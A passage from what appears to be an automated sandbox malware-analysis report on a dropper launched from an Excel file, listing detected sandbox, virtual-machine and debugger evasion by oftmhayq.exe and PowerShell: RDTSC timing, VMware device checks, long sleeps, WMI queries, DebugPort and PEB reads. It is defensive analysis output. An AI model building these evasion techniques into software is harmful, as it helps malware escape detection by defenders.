Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
Source: 5901777.xls Stream path 'Workbook' entropy: 7.92744162749 (max. 8.0)

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: oftmhayq.exe, 00000018.00000002.468670038.0000000002BC9000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.467738260.0000000003439000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\oftmhayq.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\oftmhayq.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00409A90 rdtsc 29_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3864 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3310 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5124 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3318 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744 Thread sleep count: 3864 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388 Thread sleep count: 3310 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6120 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1304 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5860 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5832 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6124 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4244 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe TID: 5308 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Users\Public\oftmhayq.exe TID: 4472 Thread sleep count: 63 > 30 Jump to behavior
Source: C:\Users\Public\oftmhayq.exe TID: 2288 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\oftmhayq.exe TID: 1012 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Users\Public\oftmhayq.exe TID: 6576 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe TID: 4020 Thread sleep count: 59 > 30
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\Public\oftmhayq.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\Public\oftmhayq.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\splwow64.exe Last function: Thread delayed
Source: C:\Windows\splwow64.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001F.00000000.510806745.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000014.00000002.442866575.000001D222633000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
Source: oftmhayq.exe, 00000019.00000002.467738260.0000000003439000.00000004.00000001.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000015.00000002.442626587.000001F6E4550000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001F.00000000.501168197.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001F.00000000.515471921.000000000F6C0000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATA_CD00#5&v
Source: powershell.exe, 00000015.00000002.442626587.000001F6E4550000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000014.00000002.443094933.000001D222698000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\Public\oftmhayq.exe Process queried: DebugPort
Source: C:\Users\Public\oftmhayq.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00409A90 rdtsc 29_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0040ACD0 LdrLoadDll, 29_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130513A mov eax, dword ptr fs:[00000030h] 29_2_0130513A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130513A mov eax, dword ptr fs:[00000030h] 29_2_0130513A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h] 29_2_012F4120
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h] 29_2_012F4120
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h] 29_2_012F4120
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h] 29_2_012F4120
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F4120 mov ecx, dword ptr fs:[00000030h] 29_2_012F4120
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D3138 mov ecx, dword ptr fs:[00000030h] 29_2_012D3138
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9100 mov eax, dword ptr fs:[00000030h] 29_2_012D9100
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9100 mov eax, dword ptr fs:[00000030h] 29_2_012D9100
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9100 mov eax, dword ptr fs:[00000030h] 29_2_012D9100
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E0100 mov eax, dword ptr fs:[00000030h] 29_2_012E0100
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E0100 mov eax, dword ptr fs:[00000030h] 29_2_012E0100
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E0100 mov eax, dword ptr fs:[00000030h] 29_2_012E0100
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DC962 mov eax, dword ptr fs:[00000030h] 29_2_012DC962
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139E962 mov eax, dword ptr fs:[00000030h] 29_2_0139E962
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DB171 mov eax, dword ptr fs:[00000030h] 29_2_012DB171
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DB171 mov eax, dword ptr fs:[00000030h] 29_2_012DB171
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8966 mov eax, dword ptr fs:[00000030h] 29_2_013A8966
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391951 mov eax, dword ptr fs:[00000030h] 29_2_01391951
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB944 mov eax, dword ptr fs:[00000030h] 29_2_012FB944
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB944 mov eax, dword ptr fs:[00000030h] 29_2_012FB944
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D395E mov eax, dword ptr fs:[00000030h] 29_2_012D395E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D395E mov eax, dword ptr fs:[00000030h] 29_2_012D395E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h] 29_2_012E61A7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h] 29_2_012E61A7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h] 29_2_012E61A7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h] 29_2_012E61A7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013551BE mov eax, dword ptr fs:[00000030h] 29_2_013551BE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013551BE mov eax, dword ptr fs:[00000030h] 29_2_013551BE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013551BE mov eax, dword ptr fs:[00000030h] 29_2_013551BE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013551BE mov eax, dword ptr fs:[00000030h] 29_2_013551BE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013099BC mov eax, dword ptr fs:[00000030h] 29_2_013099BC
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130C9BF mov eax, dword ptr fs:[00000030h] 29_2_0130C9BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130C9BF mov eax, dword ptr fs:[00000030h] 29_2_0130C9BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013AF1B5 mov eax, dword ptr fs:[00000030h] 29_2_013AF1B5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013AF1B5 mov eax, dword ptr fs:[00000030h] 29_2_013AF1B5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013061A0 mov eax, dword ptr fs:[00000030h] 29_2_013061A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013061A0 mov eax, dword ptr fs:[00000030h] 29_2_013061A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013569A6 mov eax, dword ptr fs:[00000030h] 29_2_013569A6
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h] 29_2_013949A4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h] 29_2_013949A4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h] 29_2_013949A4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h] 29_2_013949A4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302990 mov eax, dword ptr fs:[00000030h] 29_2_01302990
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304190 mov eax, dword ptr fs:[00000030h] 29_2_01304190
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FC182 mov eax, dword ptr fs:[00000030h] 29_2_012FC182
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139A189 mov eax, dword ptr fs:[00000030h] 29_2_0139A189
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139A189 mov ecx, dword ptr fs:[00000030h] 29_2_0139A189
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D519E mov eax, dword ptr fs:[00000030h] 29_2_012D519E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D519E mov ecx, dword ptr fs:[00000030h] 29_2_012D519E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130A185 mov eax, dword ptr fs:[00000030h] 29_2_0130A185
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D8190 mov ecx, dword ptr fs:[00000030h] 29_2_012D8190
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FD1EF mov eax, dword ptr fs:[00000030h] 29_2_012FD1EF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DB1E1 mov eax, dword ptr fs:[00000030h] 29_2_012DB1E1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DB1E1 mov eax, dword ptr fs:[00000030h] 29_2_012DB1E1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DB1E1 mov eax, dword ptr fs:[00000030h] 29_2_012DB1E1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D31E0 mov eax, dword ptr fs:[00000030h] 29_2_012D31E0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A89E7 mov eax, dword ptr fs:[00000030h] 29_2_013A89E7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013641E8 mov eax, dword ptr fs:[00000030h] 29_2_013641E8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013919D8 mov eax, dword ptr fs:[00000030h] 29_2_013919D8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h] 29_2_012E99C7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h] 29_2_012E99C7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h] 29_2_012E99C7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h] 29_2_012E99C7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EC1C0 mov eax, dword ptr fs:[00000030h] 29_2_012EC1C0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h] 29_2_012EB02A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h] 29_2_012EB02A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h] 29_2_012EB02A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h] 29_2_012EB02A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304020 mov edi, dword ptr fs:[00000030h] 29_2_01304020
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130002D mov eax, dword ptr fs:[00000030h] 29_2_0130002D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130002D mov eax, dword ptr fs:[00000030h] 29_2_0130002D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130002D mov eax, dword ptr fs:[00000030h] 29_2_0130002D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130002D mov eax, dword ptr fs:[00000030h] 29_2_0130002D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130002D mov eax, dword ptr fs:[00000030h] 29_2_0130002D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h] 29_2_012FA830
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h] 29_2_012FA830
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h] 29_2_012FA830
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h] 29_2_012FA830
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01357016 mov eax, dword ptr fs:[00000030h] 29_2_01357016
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01357016 mov eax, dword ptr fs:[00000030h] 29_2_01357016
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01357016 mov eax, dword ptr fs:[00000030h] 29_2_01357016
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D6800 mov eax, dword ptr fs:[00000030h] 29_2_012D6800
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D6800 mov eax, dword ptr fs:[00000030h] 29_2_012D6800
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D6800 mov eax, dword ptr fs:[00000030h] 29_2_012D6800
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130701D mov eax, dword ptr fs:[00000030h] 29_2_0130701D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130701D mov eax, dword ptr fs:[00000030h] 29_2_0130701D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130701D mov eax, dword ptr fs:[00000030h] 29_2_0130701D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130701D mov eax, dword ptr fs:[00000030h] 29_2_0130701D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130701D mov eax, dword ptr fs:[00000030h] 29_2_0130701D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130701D mov eax, dword ptr fs:[00000030h] 29_2_0130701D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A4015 mov eax, dword ptr fs:[00000030h] 29_2_013A4015
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A4015 mov eax, dword ptr fs:[00000030h] 29_2_013A4015
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FF86D mov eax, dword ptr fs:[00000030h] 29_2_012FF86D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392073 mov eax, dword ptr fs:[00000030h] 29_2_01392073
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A1074 mov eax, dword ptr fs:[00000030h] 29_2_013A1074
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391843 mov eax, dword ptr fs:[00000030h] 29_2_01391843
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D7057 mov eax, dword ptr fs:[00000030h] 29_2_012D7057
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5050 mov eax, dword ptr fs:[00000030h] 29_2_012D5050
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5050 mov eax, dword ptr fs:[00000030h] 29_2_012D5050
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5050 mov eax, dword ptr fs:[00000030h] 29_2_012D5050
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F0050 mov eax, dword ptr fs:[00000030h] 29_2_012F0050
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F0050 mov eax, dword ptr fs:[00000030h] 29_2_012F0050
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h] 29_2_012E28AE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h] 29_2_012E28AE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h] 29_2_012E28AE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E28AE mov ecx, dword ptr fs:[00000030h] 29_2_012E28AE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h] 29_2_012E28AE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h] 29_2_012E28AE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130F0BF mov ecx, dword ptr fs:[00000030h] 29_2_0130F0BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130F0BF mov eax, dword ptr fs:[00000030h] 29_2_0130F0BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130F0BF mov eax, dword ptr fs:[00000030h] 29_2_0130F0BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h] 29_2_013020A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h] 29_2_013020A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h] 29_2_013020A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h] 29_2_013020A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h] 29_2_013020A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h] 29_2_013020A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h] 29_2_013078A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h] 29_2_013078A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h] 29_2_013078A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h] 29_2_013078A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h] 29_2_013078A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h] 29_2_013078A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h] 29_2_013078A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h] 29_2_013078A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h] 29_2_013078A0
